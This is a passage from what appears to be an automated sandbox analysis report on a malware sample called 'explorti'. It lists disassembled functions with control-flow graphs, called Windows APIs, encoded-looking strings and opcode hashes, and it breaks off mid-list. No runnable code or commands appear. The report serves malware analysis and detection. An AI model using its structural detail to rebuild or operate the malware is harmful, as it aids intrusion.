                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: hPGA$eBs
                    • API String ID: 0-2205177332
                    • Opcode ID: f185c88d0d339aaa9b0697176a3718a3443e1c8a43972105cdc33525956d4656
                    • Instruction ID: 04fdd2f5d2be989a08a3ef4a626585067fa8a5280ff3d26ae3a204d9fbfc8f0e
                    • Opcode Fuzzy Hash: f185c88d0d339aaa9b0697176a3718a3443e1c8a43972105cdc33525956d4656
                    • Instruction Fuzzy Hash: C86125B2D002149FDF25EF68D8846EEBBB1BB45318F24402BE4496B350D7389C80CB5D
                    Function 003E8290 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1454 3e8290-3e8311 call 414000 1458 3e831d-3e8345 call 3f7840 call 3e5b00 1454->1458 1459 3e8313-3e8318 1454->1459 1467 3e8349-3e836b call 3f7840 call 3e5b00 1458->1467 1468 3e8347 1458->1468 1460 3e845f-3e847b call 3fcef4 1459->1460 1473 3e836f-3e8388 1467->1473 1474 3e836d 1467->1474 1468->1467 1477 3e838a-3e8399 1473->1477 1478 3e83b9-3e83e4 1473->1478 1474->1473 1481 3e83af-3e83b6 call 3fd569 1477->1481 1482 3e839b-3e83a9 1477->1482 1479 3e83e6-3e83f5 1478->1479 1480 3e8411-3e8432 1478->1480 1483 3e8407-3e840e call 3fd569 1479->1483 1484 3e83f7-3e8405 1479->1484 1485 3e8438-3e843d 1480->1485 1486 3e8434-3e8436 GetNativeSystemInfo 1480->1486 1481->1478 1482->1481 1487 3e847c-3e8481 call 416b7a 1482->1487 1483->1480 1484->1483 1484->1487 1491 3e843e-3e8445 1485->1491 1486->1491 1491->1460 1496 3e8447-3e844f 1491->1496 1497 3e8458-3e845b 1496->1497 1498 3e8451-3e8456 1496->1498 1497->1460 1499 3e845d 1497->1499 1498->1460 1499->1460
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 003E8434
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: eBs
                    • API String ID: 1721193555-1845495228
                    • Opcode ID: 14be8ef72e0c9fe68287ef8337926d2ad969e35b28f083a4289e20369dd3fb6e
                    • Instruction ID: afeb8f4c2b4ae534e059b45c596342f60ad20d058bd72b9698c3dfcb1e9e309a
                    • Opcode Fuzzy Hash: 14be8ef72e0c9fe68287ef8337926d2ad969e35b28f083a4289e20369dd3fb6e
                    • Instruction Fuzzy Hash: 97512871D102A89BEB25EB2ACD457EDB775EB45304F504399E808A72C1EF355E808F91
                    Function 00416F51 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56timeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1500 416f51-416f67 1501 416f77-416f87 1500->1501 1502 416f69-416f6d 1500->1502 1506 416fc7-416fca 1501->1506 1507 416f89-416f9b SystemTimeToTzSpecificLocalTime 1501->1507 1502->1501 1503 416f6f-416f75 1502->1503 1504 416fcc-416fd7 call 3fcef4 1503->1504 1506->1504 1507->1506 1509 416f9d-416fbd call 416fd8 1507->1509 1512 416fc2-416fc5 1509->1512 1512->1504
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00416F93
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID: eBs
                    • API String ID: 2574697306-1845495228
                    • Opcode ID: e1e710e4571f392395b6f52d34cc117a9e43d1ca8fc91ccebfddcf4cd482db03
                    • Instruction ID: 2d47007ab2808f8258990192f88cb1c19bebdf870bdb6842ac71ec7465137687
                    • Opcode Fuzzy Hash: e1e710e4571f392395b6f52d34cc117a9e43d1ca8fc91ccebfddcf4cd482db03
                    • Instruction Fuzzy Hash: C7112EB290010CABDB11DE95D940EEFB7BCAF08314F615267E511E6180EB34EB49CB65
                    Function 003F6AB0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: eBs
                    • API String ID: 3472027048-1845495228
                    • Opcode ID: 36f6404daeeb6b86404f721e52d7744a5e78284951bd56c95ea136724f5efa77
                    • Instruction ID: 12e726aeffa2987ecd58ba2de84bfd82e13aa58357e9d3fba1127756561807f4
                    • Opcode Fuzzy Hash: 36f6404daeeb6b86404f721e52d7744a5e78284951bd56c95ea136724f5efa77
                    • Instruction Fuzzy Hash: ADF0F471E00518ABC702BF699D07B1EBB75EB02B60FD00398F9106B3D1DAB45A1087D6
                    Function 00416C79 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1525 416c79-416c85 1526 416ca4-416cc8 call 414000 1525->1526 1527 416c87-416ca3 call 417410 call 417423 call 416b6a 1525->1527 1532 416ce6-416d08 CreateFileW 1526->1532 1533 416cca-416ce4 call 417410 call 417423 call 416b6a 1526->1533 1536 416d18-416d1f call 416d57 1532->1536 1537 416d0a-416d0e call 416de1 1532->1537 1557 416d52-416d56 1533->1557 1547 416d20-416d22 1536->1547 1544 416d13-416d16 1537->1544 1544->1547 1549 416d44-416d47 1547->1549 1550 416d24-416d41 call 414000 1547->1550 1553 416d50 1549->1553 1554 416d49-416d4f 1549->1554 1550->1549 1553->1557 1554->1553
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7bff23d753cea073bad22204ffbaa4d8eb480eb10e5a640d1c0e7f42368743a6
                    • Instruction ID: 6e96cb8525535cb756ea94d153fc795c7cd1ad946efcab12af9ec94f61b836e8
                    • Opcode Fuzzy Hash: 7bff23d753cea073bad22204ffbaa4d8eb480eb10e5a640d1c0e7f42368743a6
                    • Instruction Fuzzy Hash: D921D871A051087AEB117B65AC42BDF37399F4137CF22031AF9242B1D1DB78AD4586A9
                    Function 0041D6CF Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1559 41d6cf-41d6da 1560 41d6e8-41d6ee 1559->1560 1561 41d6dc-41d6e6 1559->1561 1563 41d6f0-41d6f1 1560->1563 1564 41d707-41d718 RtlAllocateHeap 1560->1564 1561->1560 1562 41d71c-41d727 call 417423 1561->1562 1569 41d729-41d72b 1562->1569 1563->1564 1566 41d6f3-41d6fa call 419c61 1564->1566 1567 41d71a 1564->1567 1566->1562 1572 41d6fc-41d705 call 418cd9 1566->1572 1567->1569 1572->1562 1572->1564
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0041A5CD,?,0041748E,?,00000000,?), ref: 0041D711
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: e8cf26aa53e7a0ba931e3a295c0e70b6ae6e0b2354b63b9098d7ce57c5f2c921
                    • Instruction ID: 5c14b4e879190d9aaafa001194bbc37fc107fe6c5593e522ceaf3c42d1eee4ed
                    • Opcode Fuzzy Hash: e8cf26aa53e7a0ba931e3a295c0e70b6ae6e0b2354b63b9098d7ce57c5f2c921
                    • Instruction Fuzzy Hash: C4F0E971D05124669B216A629C01ADBB759EF46360B194517EC18962C1DB2CD88142ED
                    Function 04E00807 Relevance: .1, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f8074bfdd531061849c082d7e6533808e0db21501920a46dd978b576a55f789
                    • Instruction ID: a5b4a8830766cd7c35ae62471d7589188d34d1995f3d99b9ea1086fc5459ba6c
                    • Opcode Fuzzy Hash: 0f8074bfdd531061849c082d7e6533808e0db21501920a46dd978b576a55f789
                    • Instruction Fuzzy Hash: 9CF0C2AB24C104BDA1A256853704AF67B6DF7C6330330C02AF817D1581F2A51AD576B4
                    Function 04E007DF Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb44e2dc782b992c6f624699c0a6ae219cb2abf5f2c6398ae0a1ae6b932914bb
                    • Instruction ID: 0b82b52b265908408002656a21982a2daab6c1a53e211b56f34dd83cf9a78d78
                    • Opcode Fuzzy Hash: bb44e2dc782b992c6f624699c0a6ae219cb2abf5f2c6398ae0a1ae6b932914bb
                    • Instruction Fuzzy Hash: 16F059AB204204FED1A24B407504BF63B68FBC6330330D16AF86396180F26819E16AB0
                    Function 04E008A3 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 784837e7b6c1148f1ae331d5b8027e696920d18b5c5e3d616718249433b9255d
                    • Instruction ID: b41242642c019865e0f9391d806df0dc23f543036e5a54f8be6bc532d5753f2f
                    • Opcode Fuzzy Hash: 784837e7b6c1148f1ae331d5b8027e696920d18b5c5e3d616718249433b9255d
                    • Instruction Fuzzy Hash: D5F0529B61D111ADDB22566230843F23FA0BB87331736A4AAE482E2483E11C28CB8371
                    Function 04E00822 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8c210185283e0adc73cd9026cb741b5988bea832c3015629dd8c551680f6427
                    • Instruction ID: e26b5fc8a38891d5560b50e7832c08d4b6c7ea74c675397c2a0178589d4c487c
                    • Opcode Fuzzy Hash: d8c210185283e0adc73cd9026cb741b5988bea832c3015629dd8c551680f6427
                    • Instruction Fuzzy Hash: 98F09EAB20C204FDD2A14B54B5087F63B69FBC6330730C42BF413D1581E36418E5A7B0
                    Function 04E0083F Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d252932f37530020a98f5148300ce80121e3457303d76b82f4ebe6f175539cb8
                    • Instruction ID: 885bb20c3be483039dfc04705873447bb4b78866f6d2d609eb6240589cfc2cb2
                    • Opcode Fuzzy Hash: d252932f37530020a98f5148300ce80121e3457303d76b82f4ebe6f175539cb8
                    • Instruction Fuzzy Hash: 79E0559B208608ADA1A15750360CBF3376CF7D2332330C27BF863D1181E4542CD6AAB4
                    Function 04E00852 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0a273f578f87ecbb5d97504e6beeb2693c64986823332e36836921548817ae3e
                    • Instruction ID: a8db037f7258be526a51ba4e3c3e20a9a73979c0842db03b9122ec3511888785
                    • Opcode Fuzzy Hash: 0a273f578f87ecbb5d97504e6beeb2693c64986823332e36836921548817ae3e
                    • Instruction Fuzzy Hash: ACE020AB208101BDE17196553604BF7777CB7C6330330D576F463D6281E15819D667B5
                    Function 04E00868 Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb724b0ff105bfb4570f245d86d8534a5ff57a11a9462fa82ddd182e97e11954
                    • Instruction ID: 6b887e662e7233e52fc3a128290c3ec32a7fc88e73ce6564d112da46c06e605b
                    • Opcode Fuzzy Hash: bb724b0ff105bfb4570f245d86d8534a5ff57a11a9462fa82ddd182e97e11954
                    • Instruction Fuzzy Hash: 33E02C9B229004BDA16186403609BF26B38F2C6230330C6B3A4A2E2081E0589ADB22B4
                    Function 04E00886 Relevance: .0, Instructions: 22COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9bea3764b5a19243806e0211f3145fc3194f410c197aa27fe451083d75bd5b3c
                    • Instruction ID: e42784c7c54ded2967337b8fdb020a4054e4fd0beaea9e73b8152f1f70c2bb9b
                    • Opcode Fuzzy Hash: 9bea3764b5a19243806e0211f3145fc3194f410c197aa27fe451083d75bd5b3c
                    • Instruction Fuzzy Hash: 28D0222F209210DDE2A0E28232057F663A8B7C4331330D973E092C2180E02D19DB6BB0

                    Non-executed Functions

                    Function 003EE410 Relevance: 16.0, Strings: 12, Instructions: 1000COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 111$246122658369$4dd39d$JgNn9TI9$PJ==$PzE+$Xt==$ZMs=$ZMw=$Zww=$3D$eBs
                    • API String ID: 0-973685055
                    • Opcode ID: 1f33bfe526fd8d21b38ad8a0c1d018edf721951402819fa3305a45f7774dfcc7
                    • Instruction ID: 8d570c5ed407cef0e83cba50b749950a48d7b3f0b9c43fe317083bb6193e1538
                    • Opcode Fuzzy Hash: 1f33bfe526fd8d21b38ad8a0c1d018edf721951402819fa3305a45f7774dfcc7
                    • Instruction Fuzzy Hash: AE82D77091428CDBEF15DF68C9497DE7FB5AF46304F604299E8046B3C2C7B99A84CB92
                    Function 00423048 Relevance: 11.8, APIs: 1, Strings: 5, Instructions: 1340COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$eBs
                    • API String ID: 4168288129-347604477
                    • Opcode ID: 954d62ee9d001f5d6c1e3eb5a640c3067af56e595d088179556953672d951f03
                    • Instruction ID: db0f96515aeb8d927c426c214bd97d62319cccee0f9fe7ec64329403d59d46ac
                    • Opcode Fuzzy Hash: 954d62ee9d001f5d6c1e3eb5a640c3067af56e595d088179556953672d951f03
                    • Instruction Fuzzy Hash: 79C23871E046288FCB25CE28ED407EAB7B5EB88305F5441EBD84DA7240E77CAE818F45
                    Function 003EDFA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102networkCOMMON
                    Download Yara Rule
                    APIs
                    • recv.WS2_32(?,?,00000004,00000000), ref: 003EDFEB
                    • recv.WS2_32(?,?,00000008,00000000), ref: 003EE020
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID: eBs
                    • API String ID: 1507349165-1845495228
                    • Opcode ID: 35982cba0311f22f8f1ac44f0f6c2d51fc8c47d7b337fcacde7ea82cbf34227d
                    • Instruction ID: 173f329b6b323a3fcc6265e0b7cf8862cf27306d31c269d6a5994f84c7b27b81
                    • Opcode Fuzzy Hash: 35982cba0311f22f8f1ac44f0f6c2d51fc8c47d7b337fcacde7ea82cbf34227d
                    • Instruction Fuzzy Hash: DB31F8719002989FD721CB6ECC81BEF77ACEB09720F110735E914E72D2DA75AC458B64
                    Function 00422BB0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
